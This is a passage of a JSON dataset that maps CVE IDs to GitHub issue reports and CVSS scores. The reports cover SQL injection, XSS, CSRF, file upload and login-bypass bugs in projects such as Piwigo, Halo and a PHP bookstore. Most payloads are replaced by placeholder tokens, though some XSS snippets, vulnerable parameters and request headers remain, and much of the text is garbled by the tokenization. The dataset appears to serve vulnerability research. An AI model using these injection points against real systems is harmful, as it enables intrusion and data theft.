  50591. "description": "Gate One Whitelist Bypass. There is a configuration item \u201dorigins\u201d: FILETAG NUMBERTAG To confirm that the attacker has tried to access the Gate One server, check the gateone log on the attacked host B; the result is as follows: FILETAG It shows that Gate One did not record the real IP address of attack host APITAG but \u201clocalhost NUMBERTAG instead when the service verified the APITAG NUMBERTAG Change the http service port NUMBERTAG to NUMBERTAG on attack host A NUMBERTAG Access the page by URL APITAG from attack host A; the response is as follows: FILETAG It means attack host A has connected to Gate One successfully NUMBERTAG Check the logs of Gate One: attack host A APITAG established a connection with the attacked host: FILETAG",
  50592. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  50593. "severity": "MEDIUM",
  50594. "baseScore": 5.3,
  50595. "impactScore": 1.4,
  50596. "exploitabilityScore": 3.9
  50597. },
  50598. {
  50599. "CVE_ID": "CVE-2020-19005",
  50600. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/48",
  50601. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/48",
  50602. "Repo_new": "94fzb/zrlog",
  50603. "Issue_Created_At": "2019-04-07T11:14:36Z",
  50604. "description": "Unauthorized access to download database backup files NUMBERTAG There is no permission check on the database backup export APITAG so users can download the database backup file directly APITAG APITAG APITAG",
  50605. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
  50606. "severity": "MEDIUM",
  50607. "baseScore": 5.7,
  50608. "impactScore": 3.6,
  50609. "exploitabilityScore": 2.1
  50610. },
  50611. {
  50612. "CVE_ID": "CVE-2020-19007",
  50613. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/547",
  50614. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/547",
  50615. "Repo_new": "halo-dev/halo",
  50616. "Issue_Created_At": "2020-02-08T08:43:59Z",
  50617. "description": "Stored xss on Halo blog. APITAG APITAG Environment Server Version NUMBERTAG Admin Version NUMBERTAG APITAG APITAG Vulnerability details APITAG Halo blog allows users to submit comments on blog posts, Application receives data from an untrusted source and not filtered. step1: submit comment FILETAG The post packet is as follows\uff1a ERRORTAG step2: view the blog post After this comment has been submitted, admin who visits the blog post. The script supplied by the attacker will then execute in the victim user's browser. FILETAG FILETAG code: PATHTAG FILETAG Suggestions for repair Proper encoding of untrusted request data Rich text filtering uses a common security API library for each programming language Escaping special characters using the developer's secure escape library APITAG",
  50618. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50619. "severity": "MEDIUM",
  50620. "baseScore": 5.4,
  50621. "impactScore": 2.7,
  50622. "exploitabilityScore": 2.3
  50623. },
  50624. {
  50625. "CVE_ID": "CVE-2020-19037",
  50626. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/135",
  50627. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/135",
  50628. "Repo_new": "halo-dev/halo",
  50629. "Issue_Created_At": "2019-04-04T15:13:08Z",
  50630. "description": "Bypass password access to encrypted articles. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x ] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG",
  50631. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  50632. "severity": "MEDIUM",
  50633. "baseScore": 5.3,
  50634. "impactScore": 1.4,
  50635. "exploitabilityScore": 3.9
  50636. },
  50637. {
  50638. "CVE_ID": "CVE-2020-19038",
  50639. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/136",
  50640. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/136",
  50641. "Repo_new": "halo-dev/halo",
  50642. "Issue_Created_At": "2019-04-04T17:29:24Z",
  50643. "description": "Any file deletion in the background. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG",
  50644. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  50645. "severity": "CRITICAL",
  50646. "baseScore": 9.1,
  50647. "impactScore": 5.2,
  50648. "exploitabilityScore": 3.9
  50649. },
  50650. {
  50651. "CVE_ID": "CVE-2020-19046",
  50652. "Issue_Url_old": "https://github.com/Aoyanm/audit/issues/1",
  50653. "Issue_Url_new": "https://github.com/pagli0cci/audit/issues/1",
  50654. "Repo_new": "pagli0cci/audit",
  50655. "Issue_Created_At": "2019-04-15T03:11:35Z",
  50656. "description": "s APITAG website system)reflect xss. Vulnerability directory: APITAG Vulnerability code FILETAG Construct payload FILETAG Use code URLTAG APITAG APITAG Got the website cookie FILETAG",
  50657. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50658. "severity": "MEDIUM",
  50659. "baseScore": 5.4,
  50660. "impactScore": 2.7,
  50661. "exploitabilityScore": 2.3
  50662. },
  50663. {
  50664. "CVE_ID": "CVE-2020-19047",
  50665. "Issue_Url_old": "https://github.com/Aoyanm/audit/issues/2",
  50666. "Issue_Url_new": "https://github.com/pagli0cci/audit/issues/2",
  50667. "Repo_new": "pagli0cci/audit",
  50668. "Issue_Created_At": "2019-04-15T12:56:42Z",
  50669. "description": "Iwebshop NUMBERTAG csrf vulnerability. Vulnerability overview FILETAG Exploiting Vulnerability code text CODETAG FILETAG Exploit success picture FILETAG",
  50670. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50671. "severity": "HIGH",
  50672. "baseScore": 8.8,
  50673. "impactScore": 5.9,
  50674. "exploitabilityScore": 2.8
  50675. },
  50676. {
  50677. "CVE_ID": "CVE-2020-19048",
  50678. "Issue_Url_old": "https://github.com/joelister/bug/issues/1",
  50679. "Issue_Url_new": "https://github.com/joelister/bug/issues/1",
  50680. "Repo_new": "joelister/bug",
  50681. "Issue_Created_At": "2019-04-15T03:44:11Z",
  50682. "description": "APITAG NUMBERTAG Cross Site Scripting. Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG New Forum\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG / Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG When an unauthenticated user visits the page, the code gets executed: FILETAG",
  50683. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50684. "severity": "MEDIUM",
  50685. "baseScore": 5.4,
  50686. "impactScore": 2.7,
  50687. "exploitabilityScore": 2.3
  50688. },
  50689. {
  50690. "CVE_ID": "CVE-2020-19049",
  50691. "Issue_Url_old": "https://github.com/joelister/bug/issues/2",
  50692. "Issue_Url_new": "https://github.com/joelister/bug/issues/2",
  50693. "Repo_new": "joelister/bug",
  50694. "Issue_Created_At": "2019-04-15T04:14:08Z",
  50695. "description": "Persistent XSS on APITAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG New Forum\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: acploginattempts NUMBERTAG APITAG mybb FILETAG",
  50696. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50697. "severity": "MEDIUM",
  50698. "baseScore": 5.4,
  50699. "impactScore": 2.7,
  50700. "exploitabilityScore": 2.3
  50701. },
  50702. {
  50703. "CVE_ID": "CVE-2020-19107",
  50704. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/9",
  50705. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/9",
  50706. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50707. "Issue_Created_At": "2020-01-17T08:35:51Z",
  50708. "description": "there is a sql injection vulnerability in FILETAG parameter \"isbn\". version NUMBERTAG No login required. POC: POST FILETAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG +a&save_change NUMBERTAG FILETAG View source code APITAG APITAG filter input of parameter \"isbn\" author: EMAILTAG .cn",
  50709. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50710. "severity": "CRITICAL",
  50711. "baseScore": 9.8,
  50712. "impactScore": 5.9,
  50713. "exploitabilityScore": 3.9
  50714. },
  50715. {
  50716. "CVE_ID": "CVE-2020-19108",
  50717. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/10",
  50718. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/10",
  50719. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50720. "Issue_Created_At": "2020-01-17T08:39:23Z",
  50721. "description": "there is a sql injection vulnerability in FILETAG parameter \"pubid\". version NUMBERTAG No login required. POC: URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"pubid\" author: EMAILTAG .cn",
  50722. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50723. "severity": "CRITICAL",
  50724. "baseScore": 9.8,
  50725. "impactScore": 5.9,
  50726. "exploitabilityScore": 3.9
  50727. },
  50728. {
  50729. "CVE_ID": "CVE-2020-19109",
  50730. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/12",
  50731. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/12",
  50732. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50733. "Issue_Created_At": "2020-01-17T08:47:24Z",
  50734. "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\" . version NUMBERTAG No login required. POC: URLTAG or APITAG a APITAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
  50735. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50736. "severity": "CRITICAL",
  50737. "baseScore": 9.8,
  50738. "impactScore": 5.9,
  50739. "exploitabilityScore": 3.9
  50740. },
  50741. {
  50742. "CVE_ID": "CVE-2020-19110",
  50743. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/11",
  50744. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/11",
  50745. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50746. "Issue_Created_At": "2020-01-17T08:43:28Z",
  50747. "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\". version NUMBERTAG No login required. POC: URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
  50748. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50749. "severity": "CRITICAL",
  50750. "baseScore": 9.8,
  50751. "impactScore": 5.9,
  50752. "exploitabilityScore": 3.9
  50753. },
  50754. {
  50755. "CVE_ID": "CVE-2020-19111",
  50756. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/14",
  50757. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/14",
  50758. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50759. "Issue_Created_At": "2020-01-17T08:55:48Z",
  50760. "description": "there is a login bypass vulnerability in FILETAG . version NUMBERTAG No login required. View source code FILETAG APITAG he judgment is that if the query results of login name and password are not the same, the judgment is that the password or user name is wrong This is obviously wrong. According to this meaning, you can log in successfully as long as the user name and password are matched We test that the login name is admin password arbitrary FILETAG Login success! APITAG this code to if($name != $row['name'] || $pass != $row['pass']){ author: EMAILTAG .cn",
  50761. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50762. "severity": "CRITICAL",
  50763. "baseScore": 9.8,
  50764. "impactScore": 5.9,
  50765. "exploitabilityScore": 3.9
  50766. },
  50767. {
  50768. "CVE_ID": "CVE-2020-19112",
  50769. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/13",
  50770. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/13",
  50771. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50772. "Issue_Created_At": "2020-01-17T08:51:12Z",
  50773. "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\" . version NUMBERTAG No login required. POC\uff1a URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
  50774. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50775. "severity": "CRITICAL",
  50776. "baseScore": 9.8,
  50777. "impactScore": 5.9,
  50778. "exploitabilityScore": 3.9
  50779. },
  50780. {
  50781. "CVE_ID": "CVE-2020-19113",
  50782. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/15",
  50783. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/15",
  50784. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50785. "Issue_Created_At": "2020-01-17T09:02:08Z",
  50786. "description": "there is a arbitrary file upload in FILETAG . version NUMBERTAG No login required. POC: upload form APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG or post data POST FILETAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"add NUMBERTAG Content Disposition: form data; name=\"image\"; APITAG Content Type: text/php APITAG NUMBERTAG Content Disposition: form data; name=\"save\" upload NUMBERTAG after you upload your'e file u will find it here PATHTAG FILETAG View source code FILETAG APITAG APITAG check upload file. author: EMAILTAG .cn",
  50787. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50788. "severity": "CRITICAL",
  50789. "baseScore": 9.8,
  50790. "impactScore": 5.9,
  50791. "exploitabilityScore": 3.9
  50792. },
  50793. {
  50794. "CVE_ID": "CVE-2020-19114",
  50795. "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/8",
  50796. "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/8",
  50797. "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
  50798. "Issue_Created_At": "2020-01-17T08:29:51Z",
  50799. "description": "there is sql injection vulnerability in FILETAG parameter \"publisher\". version NUMBERTAG POC: CODETAG APITAG View source code APITAG APITAG filter input of parameter \"publisher\" author: EMAILTAG .cn",
  50800. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50801. "severity": "CRITICAL",
  50802. "baseScore": 9.8,
  50803. "impactScore": 5.9,
  50804. "exploitabilityScore": 3.9
  50805. },
  50806. {
  50807. "CVE_ID": "CVE-2020-19118",
  50808. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/14",
  50809. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/14",
  50810. "Repo_new": "yzmcms/yzmcms",
  50811. "Issue_Created_At": "2019-04-24T13:37:50Z",
  50812. "description": "Stored XSS vulnerability in yzmcms NUMBERTAG Because the data input by the user is not effectively filtered, attackers can inject javascript code into the HTML page for execution. Anyone who clicks on the page will trigger it. The stored XSS vulnerability exists in the PATHTAG POC: APITAG alert('XSS!') APITAG FILETAG APITAG the site_code parameter",
  50813. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50814. "severity": "MEDIUM",
  50815. "baseScore": 5.4,
  50816. "impactScore": 2.7,
  50817. "exploitabilityScore": 2.3
  50818. },
  50819. {
  50820. "CVE_ID": "CVE-2020-19137",
  50821. "Issue_Url_old": "https://github.com/ShuaiJunlan/Autumn/issues/82",
  50822. "Issue_Url_new": "https://github.com/shuaijunlan/autumn/issues/82",
  50823. "Repo_new": "shuaijunlan/autumn",
  50824. "Issue_Created_At": "2019-04-28T05:08:49Z",
  50825. "description": "Information Unauthorized. In an unauthorized state, you can get the account password directly URLTAG FILETAG",
  50826. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  50827. "severity": "HIGH",
  50828. "baseScore": 7.5,
  50829. "impactScore": 3.6,
  50830. "exploitabilityScore": 3.9
  50831. },
  50832. {
  50833. "CVE_ID": "CVE-2020-19138",
  50834. "Issue_Url_old": "https://github.com/dotCMS/core/issues/17796",
  50835. "Issue_Url_new": "https://github.com/dotcms/core/issues/17796",
  50836. "Repo_new": "dotcms/core",
  50837. "Issue_Created_At": "2020-01-08T07:04:03Z",
  50838. "description": "File Upload. Describe the bug Upload jsp files to control the target server Steps to reproduce the behavior NUMBERTAG APITAG () determines whether uri starts with / asset FILETAG NUMBERTAG Can bypass restricted access to files under assets, like PATHTAG FILETAG FILETAG NUMBERTAG Upload malicious JSP file here FILETAG NUMBERTAG Get file id FILETAG NUMBERTAG Execute arbitrary server commands FILETAG NUMBERTAG Can upload even without authorization FILETAG dir like this FILETAG",
  50839. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50840. "severity": "CRITICAL",
  50841. "baseScore": 9.8,
  50842. "impactScore": 5.9,
  50843. "exploitabilityScore": 3.9
  50844. },
  50845. {
  50846. "CVE_ID": "CVE-2020-1914",
  50847. "Issue_Url_old": "https://github.com/facebook/hermes/issues/373",
  50848. "Issue_Url_new": "https://github.com/facebook/hermes/issues/373",
  50849. "Repo_new": "facebook/hermes",
  50850. "Issue_Created_At": "2020-09-29T21:47:01Z",
  50851. "description": "What should be included in NUMBERTAG This issue is to discuss which fixes should be backported to the next patch release NUMBERTAG Noted that release NUMBERTAG would be exclusively for RN NUMBERTAG branch out after NUMBERTAG is resolved.",
  50852. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50853. "severity": "CRITICAL",
  50854. "baseScore": 9.8,
  50855. "impactScore": 5.9,
  50856. "exploitabilityScore": 3.9
  50857. },
  50858. {
  50859. "CVE_ID": "CVE-2020-19142",
  50860. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/65",
  50861. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/65",
  50862. "Repo_new": "idreamsoft/iCMS",
  50863. "Issue_Created_At": "2019-04-28T01:55:13Z",
  50864. "description": "iCMS7 code.",
  50865. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50866. "severity": "CRITICAL",
  50867. "baseScore": 9.8,
  50868. "impactScore": 5.9,
  50869. "exploitabilityScore": 3.9
  50870. },
  50871. {
  50872. "CVE_ID": "CVE-2020-19157",
  50873. "Issue_Url_old": "https://github.com/TL-swallow/swallow/issues/14",
  50874. "Issue_Url_new": "https://github.com/tl-swallow/swallow/issues/14",
  50875. "Repo_new": "TL-swallow/swallow",
  50876. "Issue_Created_At": "2019-06-28T04:26:45Z",
  50877. "description": "wenkucms \u4e2a\u4eba\u4e2d\u5fc3\u81ea\u6211\u4ecb\u7ecd XSS. CODETAG",
  50878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50879. "severity": "MEDIUM",
  50880. "baseScore": 6.1,
  50881. "impactScore": 2.7,
  50882. "exploitabilityScore": 2.8
  50883. },
  50884. {
  50885. "CVE_ID": "CVE-2020-19165",
  50886. "Issue_Url_old": "https://github.com/Mint60/PHP/issues/1",
  50887. "Issue_Url_new": "https://github.com/mint60/php/issues/1",
  50888. "Repo_new": "mint60/php",
  50889. "Issue_Created_At": "2020-04-14T04:27:35Z",
  50890. "description": "phpshe NUMBERTAG Blind SQL injection NUMBERTAG ulnerability description Test object NUMBERTAG website: PHPSHE shopping system NUMBERTAG the website domain name: FILETAG NUMBERTAG IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C mall system NUMBERTAG build NUMBERTAG UTF8) Vulnerability description: Lingbao Jianhao network technology co., LTD. PHPSHE cms system background SQL injection vulnerability NUMBERTAG ulnerability details The FILETAG line NUMBERTAG execution flow introduces the FILETAG FILETAG FILETAG Line NUMBERTAG introduces FILETAG FILETAG the FILETAG line NUMBERTAG pe_select function to user level adjustment FILETAG The pe_select function is defined on line NUMBERTAG of PATHTAG In the pe_select function, the value of the userlevel_id parameter has undergone a series of processing of the dowhere function, and finally directly spliced into the sql statement, there is no security filtering. FILETAG The code for the _dowhere function FILETAG NUMBERTAG POC Vulnerability parameter userlevel_id CODETAG Vulnerability verification method: APITAG FILETAG",
  50891. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50892. "severity": "CRITICAL",
  50893. "baseScore": 9.8,
  50894. "impactScore": 5.9,
  50895. "exploitabilityScore": 3.9
  50896. },
  50897. {
  50898. "CVE_ID": "CVE-2020-19199",
  50899. "Issue_Url_old": "https://github.com/qinggan/phpok/issues/5",
  50900. "Issue_Url_new": "https://github.com/qinggan/phpok/issues/5",
  50901. "Repo_new": "qinggan/phpok",
  50902. "Issue_Created_At": "2019-05-03T07:34:07Z",
  50903. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following two page poc\uff1a APITAG add a administrator APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  50904. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50905. "severity": "HIGH",
  50906. "baseScore": 8.8,
  50907. "impactScore": 5.9,
  50908. "exploitabilityScore": 2.8
  50909. },
  50910. {
  50911. "CVE_ID": "CVE-2020-19212",
  50912. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1009",
  50913. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1009",
  50914. "Repo_new": "piwigo/piwigo",
  50915. "Issue_Created_At": "2019-05-05T08:40:59Z",
  50916. "description": "Piwigo NUMBERTAG SQL injection in FILETAG . An SQL injection has been discovered in the administration panel of Piwigo NUMBERTAG The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure. The vulnerability was found in the 'delete' method in FILETAG , because it does not validate and filter the '$group' parameter when it gets the parameters. And the vulnerability could query any data in the database and display it on the page. In the figure, I obtained the encrypted password of the user table. FILETAG FILETAG",
  50917. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  50918. "severity": "MEDIUM",
  50919. "baseScore": 4.9,
  50920. "impactScore": 3.6,
  50921. "exploitabilityScore": 1.2
  50922. },
  50923. {
  50924. "CVE_ID": "CVE-2020-19213",
  50925. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1010",
  50926. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1010",
  50927. "Repo_new": "piwigo/piwigo",
  50928. "Issue_Created_At": "2019-05-06T10:00:18Z",
  50929. "description": "Piwigo NUMBERTAG SQL injection in FILETAG . Hi, I found a sql injection vulnerability in APITAG The 'move_categories' method is called when moving the album in APITAG but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability. replace any of the following parameter in POST requests to reappear the vulnerability\uff1a APITAG or APITAG I use 'sqlmap' to reappear the vulnerability: FILETAG FILETAG",
  50930. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50931. "severity": "CRITICAL",
  50932. "baseScore": 9.8,
  50933. "impactScore": 5.9,
  50934. "exploitabilityScore": 3.9
  50935. },
  50936. {
  50937. "CVE_ID": "CVE-2020-19215",
  50938. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1011",
  50939. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1011",
  50940. "Repo_new": "piwigo/piwigo",
  50941. "Issue_Created_At": "2019-05-07T10:09:41Z",
  50942. "description": "Piwigo NUMBERTAG SQL injection in FILETAG and FILETAG . hi, I found two new vulnerabilities in FILETAG and FILETAG NUMBERTAG request URLTAG APITAG to have a private album then move the album from the right to the left payload: APITAG or use 'sqlmap' FILETAG FILETAG FILETAG FILETAG NUMBERTAG same as the first, request APITAG APITAG to have a private album then move the album from the right to the left payload: APITAG or use 'sqlmap' FILETAG FILETAG FILETAG FILETAG",
  50943. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  50944. "severity": "HIGH",
  50945. "baseScore": 8.8,
  50946. "impactScore": 5.9,
  50947. "exploitabilityScore": 2.8
  50948. },
  50949. {
  50950. "CVE_ID": "CVE-2020-19217",
  50951. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1012",
  50952. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1012",
  50953. "Repo_new": "piwigo/piwigo",
  50954. "Issue_Created_At": "2019-05-08T08:06:27Z",
  50955. "description": "Piwigo NUMBERTAG SQL injection in FILETAG . APITAG is a vulnerability in the FILETAG . FILETAG I didn't find the full trigger request in the browser, so I added the \u2018&filter_category_use=on\u2019 parameter to the request based on the code. ERRORTAG FILETAG FILETAG FILETAG FILETAG",
  50956. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  50957. "severity": "HIGH",
  50958. "baseScore": 8.8,
  50959. "impactScore": 5.9,
  50960. "exploitabilityScore": 2.8
  50961. },
  50962. {
  50963. "CVE_ID": "CVE-2020-19228",
  50964. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1242",
  50965. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1242",
  50966. "Repo_new": "bludit/bludit",
  50967. "Issue_Created_At": "2020-07-24T09:06:36Z",
  50968. "description": "File upload vulnerability. Bludit NUMBERTAG has a file upload vulnerability in 'backup' plugin . It requires administrator privileges NUMBERTAG open URLTAG Activate 'backup' plugin and click the Settings FILETAG NUMBERTAG open URLTAG upload the ' FILETAG zip file that I provide . The zip file has a FILETAG in the bl content\\uploads directory, Notices: please be careful not to open or modify this zip file, because this will cause an error FILETAG NUMBERTAG click the APITAG Backup' FILETAG NUMBERTAG FILETAG Open the url can see phpinfo ,and can use 'ant' to connect the backdoor via FILETAG FILETAG FILETAG",
  50969. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  50970. "severity": "HIGH",
  50971. "baseScore": 7.2,
  50972. "impactScore": 5.9,
  50973. "exploitabilityScore": 1.2
  50974. },
  50975. {
  50976. "CVE_ID": "CVE-2020-19229",
  50977. "Issue_Url_old": "https://github.com/thinkgem/jeesite/issues/490",
  50978. "Issue_Url_new": "https://github.com/thinkgem/jeesite/issues/490",
  50979. "Repo_new": "thinkgem/jeesite",
  50980. "Issue_Created_At": "2019-05-05T08:10:51Z",
  50981. "description": "jeesite\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e. jeesite APITAG command execution vulnerability\uff09 \u6f0f\u6d1e\u5229\u7528\u8fc7\u7a0b jeesite \u4f7f\u7528\u4e86 apache shiro APITAG FILETAG \u56e0apache APITAG \u4ee5\u516c\u7f51\u67d0\u7f51\u7ad9\u4e3a\u4f8b\uff1a\uff08\u53c2\u8003\uff1a URLTAG \uff09 FILETAG APITAG APITAG \u4fee\u590d\u5efa\u8bae \u5347\u7ea7 Shiro NUMBERTAG",
